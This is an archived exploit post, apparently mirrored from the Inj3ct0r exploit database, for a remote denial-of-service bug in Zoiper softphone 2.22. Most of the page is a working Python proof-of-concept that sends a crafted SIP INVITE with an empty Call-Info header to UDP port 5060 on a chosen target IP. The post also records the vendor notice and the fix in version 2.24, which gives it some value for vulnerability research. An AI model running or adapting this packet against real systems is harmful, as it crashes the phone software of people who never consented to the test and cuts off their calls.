Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22657
HistoryOct 19, 2009 - 12:00 a.m.

Vulnerability in Zoiper softphone version 2.22 - Denial Of Service

2009-10-1900:00:00
vulners.com
33

#==================================================================
#Vulnerability in Zoiper softphone version 2.22 - Denial Of Service
#==================================================================

#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0 _ __ __ __ 1
#1 /' \ __ /'`\ /\ \ /'`\ 0
#0 /\, \ ___ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ ___ 1
#1 \/
/\ \ /' _ `\ \/\ \/
/
\< /'
\ \ \/\ \ \ \ \/\`'\ 0
#0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \
/\ \ \\ \ \\ \ \ \/ 1
#1 \ \\ \\ \\\ \ \ \/\ \\\ \
\\ \/\ \\ 0
#0 \/
/\/
/\/
/\ \\ \/
/ \// \// \// \// 1
#1 \ \
/ >> Exploit database separated by exploit 0
#0 \/
/ type (local, remote, DoS, etc.) 1
#1 0
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com

#!/usr/bin/python

ZoIPer v2.22 Call-Info Remote Denial Of Service.

Remote Crash P.O.C.

Tested on Windows XP SP2 , SP3 , Ubuntu 8.10

Vendor Notified on: 21/09/2009

Vendor Fix: Fixed in version 2.24 Library 5324

Bad Chars: \x20 , \x09

import sys
import socket
import os

def main(argc , argv):

if len&#40;sys.argv&#41; != 2:
	os.system&#40;&quot;cls&quot;&#41;
	sys.exit&#40;&quot;Usage: &quot; + sys.argv[0] + &quot; &lt;target_ip&gt;&#92;n&quot;&#41;

target_host = sys.argv[1]
target_port = 5060

evil_packet =   &quot;&#92;x49&#92;x4e&#92;x56&#92;x49&#92;x54&#92;x45&#92;x20&#92;x73&#92;x69&#92;x70&#92;x3a&#92;x4e&#92;x65&#92;x6f&#92;x40&#92;x31&quot;+&#92;
				&quot;&#92;x30&#92;x2e&#92;x30&#92;x2e&#92;x30&#92;x2e&#92;x31&#92;x20&#92;x53&#92;x49&#92;x50&#92;x2f&#92;x32&#92;x2e&#92;x30&#92;x0d&quot;+&#92;
				&quot;&#92;x0a&#92;x56&#92;x69&#92;x61&#92;x3a&#92;x20&#92;x53&#92;x49&#92;x50&#92;x2f&#92;x32&#92;x2e&#92;x30&#92;x2f&#92;x55&#92;x44&quot;+&#92;
				&quot;&#92;x50&#92;x20&#92;x31&#92;x39&#92;x32&#92;x2e&#92;x31&#92;x36&#92;x38&#92;x2e&#92;x35&#92;x37&#92;x2e&#92;x31&#92;x33&#92;x31&quot;+&#92;
				&quot;&#92;x3a&#92;x31&#92;x32&#92;x39&#92;x38&#92;x3b&#92;x62&#92;x72&#92;x61&#92;x6e&#92;x63&#92;x68&#92;x3d&#92;x7a&#92;x39&#92;x68&quot;+&#92;
				&quot;&#92;x47&#92;x34&#92;x62&#92;x4b&#92;x4a&#92;x52&#92;x6e&#92;x54&#92;x67&#92;x67&#92;x76&#92;x4d&#92;x47&#92;x6c&#92;x2d&#92;x36&quot;+&#92;
				&quot;&#92;x32&#92;x33&#92;x33&#92;x0d&#92;x0a&#92;x4d&#92;x61&#92;x78&#92;x2d&#92;x46&#92;x6f&#92;x72&#92;x77&#92;x61&#92;x72&#92;x64&quot;+&#92;
				&quot;&#92;x73&#92;x3a&#92;x20&#92;x37&#92;x30&#92;x0d&#92;x0a&#92;x46&#92;x72&#92;x6f&#92;x6d&#92;x3a&#92;x20&#92;x4d&#92;x6f&#92;x72&quot;+&#92;
				&quot;&#92;x70&#92;x68&#92;x65&#92;x75&#92;x73&#92;x20&#92;x3c&#92;x73&#92;x69&#92;x70&#92;x3a&#92;x4d&#92;x6f&#92;x72&#92;x70&#92;x68&quot;+&#92;
				&quot;&#92;x65&#92;x75&#92;x73&#92;x40&#92;x31&#92;x39&#92;x32&#92;x2e&#92;x31&#92;x36&#92;x38&#92;x2e&#92;x35&#92;x37&#92;x2e&#92;x31&quot;+&#92;
				&quot;&#92;x33&#92;x31&#92;x3e&#92;x3b&#92;x74&#92;x61&#92;x67&#92;x3d&#92;x66&#92;x37&#92;x6d&#92;x58&#92;x5a&#92;x71&#92;x67&#92;x71&quot;+&#92;
				&quot;&#92;x5a&#92;x79&#92;x2d&#92;x36&#92;x32&#92;x33&#92;x33&#92;x0d&#92;x0a&#92;x54&#92;x6f&#92;x3a&#92;x20&#92;x4e&#92;x65&#92;x6f&quot;+&#92;
				&quot;&#92;x20&#92;x3c&#92;x73&#92;x69&#92;x70&#92;x3a&#92;x4e&#92;x65&#92;x6f&#92;x40&#92;x31&#92;x30&#92;x2e&#92;x30&#92;x2e&#92;x30&quot;+&#92;
				&quot;&#92;x2e&#92;x31&#92;x3e&#92;x0d&#92;x0a&#92;x43&#92;x61&#92;x6c&#92;x6c&#92;x2d&#92;x49&#92;x44&#92;x3a&#92;x20&#92;x77&#92;x53&quot;+&#92;
				&quot;&#92;x48&#92;x68&#92;x48&#92;x6a&#92;x6e&#92;x67&#92;x39&#92;x39&#92;x2d&#92;x36&#92;x32&#92;x33&#92;x33&#92;x40&#92;x31&#92;x39&quot;+&#92;
				&quot;&#92;x32&#92;x2e&#92;x31&#92;x36&#92;x38&#92;x2e&#92;x35&#92;x37&#92;x2e&#92;x31&#92;x33&#92;x31&#92;x0d&#92;x0a&#92;x43&#92;x53&quot;+&#92;
				&quot;&#92;x65&#92;x71&#92;x3a&#92;x20&#92;x36&#92;x32&#92;x33&#92;x33&#92;x20&#92;x49&#92;x4e&#92;x56&#92;x49&#92;x54&#92;x45&#92;x0d&quot;+&#92;
				&quot;&#92;x0a&#92;x43&#92;x6f&#92;x6e&#92;x74&#92;x61&#92;x63&#92;x74&#92;x3a&#92;x20&#92;x3c&#92;x73&#92;x69&#92;x70&#92;x3a&#92;x4d&quot;+&#92;
				&quot;&#92;x6f&#92;x72&#92;x70&#92;x68&#92;x65&#92;x75&#92;x73&#92;x40&#92;x31&#92;x39&#92;x32&#92;x2e&#92;x31&#92;x36&#92;x38&#92;x2e&quot;+&#92;
				&quot;&#92;x35&#92;x37&#92;x2e&#92;x31&#92;x33&#92;x31&#92;x3e&#92;x0d&#92;x0a&#92;x43&#92;x6f&#92;x6e&#92;x74&#92;x65&#92;x6e&#92;x74&quot;+&#92;
				&quot;&#92;x2d&#92;x54&#92;x79&#92;x70&#92;x65&#92;x3a&#92;x20&#92;x61&#92;x70&#92;x70&#92;x6c&#92;x69&#92;x63&#92;x61&#92;x74&#92;x69&quot;+&#92;
				&quot;&#92;x6f&#92;x6e&#92;x2f&#92;x73&#92;x64&#92;x70&#92;x0d&#92;x0a&#92;x43&#92;x61&#92;x6c&#92;x6c&#92;x2d&#92;x49&#92;x6e&#92;x66&quot;+&#92;
				&quot;&#92;x6f&#92;x3a&#92;x20&#92;x20&#92;x0d&#92;x0a&#92;x43&#92;x6f&#92;x6e&#92;x74&#92;x65&#92;x6e&#92;x74&#92;x2d&#92;x4c&quot;+&#92;
				&quot;&#92;x65&#92;x6e&#92;x67&#92;x74&#92;x68&#92;x3a&#92;x20&#92;x31&#92;x32&#92;x35&#92;x0d&#92;x0a&#92;x0d&#92;x0a&quot;

os.system&#40;&quot;cls&quot;&#41;				
print &quot;[+] ZoIPer Call-Info Remote Denial Of Service&#92;r&#92;n&quot;
print &quot;[+] Connecting to &#37;s on port &#37;d&#92;r&#92;n&quot; &#37; &#40;target_host,target_port&#41;

s = socket.socket&#40;socket.AF_INET, socket.SOCK_DGRAM&#41;
try:
	s.connect&#40;&#40;target_host,target_port&#41;&#41;
	print &quot;[+] Trying To Send Evil Packet...&#92;r&#92;n&quot;
	s.sendall&#40;evil_packet&#41;
	s.close&#40;&#41;
	print &quot;[+] Done!&#92;r&#92;n&quot;
except:
	print &quot;[x] Connection Error!&#92;r&#92;n&quot;

if (name == "main"):
sys.exit(main(len(sys.argv), sys.argv))

#----------------------------------------------

RIP - milw0rm, or the king is dead long live the new king inj3ct0r.com

ThE End =] Visit my proj3ct :

http://inj3ct0r.com

http://inj3ct0r.org

http://inj3ct0r.net

~ - [ [ : Inj3ct0r : ] ]